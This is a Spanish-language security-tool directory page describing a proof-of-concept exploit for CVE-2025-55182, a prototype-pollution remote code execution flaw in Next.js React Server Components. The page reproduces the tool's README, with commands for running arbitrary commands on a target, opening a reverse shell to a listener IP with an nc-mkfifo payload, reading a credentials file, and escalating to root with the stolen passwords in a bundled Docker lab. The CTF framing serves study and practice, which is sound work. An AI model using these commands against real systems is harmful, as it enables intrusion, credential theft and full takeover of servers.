Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/nkwenti-severian-ndongtsop/poc_react2shell_cve-2025-55182
Generación de PayloadsExplotaciónExplotación de Aplicaciones WebCTFPruebas de PenetraciónAprendizaje y EducaciónLabs y Práctica
GitHubnkwenti-severian-ndongtsop/poc_react2shell_cve-2025-55182

POC_react2shell_CVE-2025-55182

Exploit para CVE-2025-55182 dirigido a Next.js React Server Components mediante contaminación de prototipos, permitiendo ejecución remota de código con ejecución de comandos y cargas útiles de reverse shell. Incluye entornos de laboratorio Docker para práctica.

Ver RepositorioSitio web
2hace 8 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Exploit RCE en Componentes de Servidor React de Next.js

Explota CVE-2025-55182 para ejecución remota de código mediante contaminación de prototipos.

Autor: Severian N.K.

Descripción

Esta herramienta explota una vulnerabilidad de contaminación de prototipos en aplicaciones Next.js que utilizan Componentes de Servidor React, lo que lleva a Ejecución Remota de Código (RCE). Soporta tanto la ejecución directa de comandos como shells inversos.

Instalación

Este proyecto utiliza un entorno virtual de Python para gestionar las dependencias. Primero, asegúrate de tener Python 3 instalado.

  1. Configurar el entorno virtual:

    root@kitploit:~
    python3 -m venv venv
    
  2. Activar el entorno e instalar las dependencias:

    root@kitploit:~
    source venv/bin/activate
    pip install -r requirements.txt
    

Uso

Asegúrate de que el entorno virtual esté activado (source venv/bin/activate) antes de ejecutar el exploit.

Ejecución de Comandos

Para ejecutar un solo comando en el objetivo:

root@kitploit:~
python3 exploit.py -u <TARGET_URL> -c "<COMMAND>"

Ejemplo:

root@kitploit:~
python3 exploit.py -u http://example.com -c "id"

Shell Inversa

Para obtener una shell inversa desde el objetivo:

root@kitploit:~
python3 exploit.py -u <TARGET_URL> -r -l <LISTENER_IP> -p <LISTENER_PORT>

Ejemplo:

root@kitploit:~
python3 exploit.py -u http://example.com -r -l 10.10.10.2 -p 9001 -P nc-mkfifo

Entorno de Laboratorio

El directorio lab/ contiene dos entornos Docker independientes:

  1. App Vulnerable (lab/vulnerable): Ejecutándose en el puerto 3000.
  2. App Parcheada (lab/patched): Ejecutándose en el puerto 3001.

1. Configurar App Vulnerable

root@kitploit:~
cd lab/vulnerable
chmod +x build.sh run.sh
./build.sh
./run.sh

Accede en: http://localhost:3000

2. Configurar App Parcheada

root@kitploit:~
cd lab/patched
chmod +x build.sh run.sh
./build.sh
./run.sh

Accede en: http://localhost:3001

3. Probar Shell Inversa

Debes especificar tu IP de escucha (--lhost) y puerto (--lport). Puedes encontrar tu IP del puente Docker con ip addr show docker0 (generalmente 172.17.0.1).

root@kitploit:~
python exploit.py -u http://localhost:3000 -r -l 172.17.0.1 -p 6000 -P nc-mkfifo

Nota: Usamos -P nc-mkfifo porque el objetivo está ejecutando Alpine Linux, lo que requiere un tipo de payload específico.

Paso 2: Acceder a Secretos

El contenedor vulnerable expone un archivo secreto.

root@kitploit:~
python3 exploit.py -u http://localhost:3000 -c "cat /secret/credentials.txt"
# Output: manager:SuperSecret2025!

Paso 3: Escalada de Privilegios

Puedes escalar de nextjs a root usando las credenciales comprometidas.

  1. Cambiar de Usuario: su - manager (Contraseña: SuperSecret2025!)
  2. Convertirse en Root: sudo su (Contraseña: SuperSecret2025!)
  3. Capturar la Flag:
    root@kitploit:~
    cat /root/flag.txt
    # Output: Congratulations! You have gained full control over the system!
    

Referencias

  • Análisis Técnico (Gist)
  • Laboratorio Práctico (TryHackMe)

Contribuciones

¡Las contribuciones son bienvenidas! Si encuentras un error o tienes una idea para una mejora, por favor abre un issue o envía un pull request.

Descargar herramienta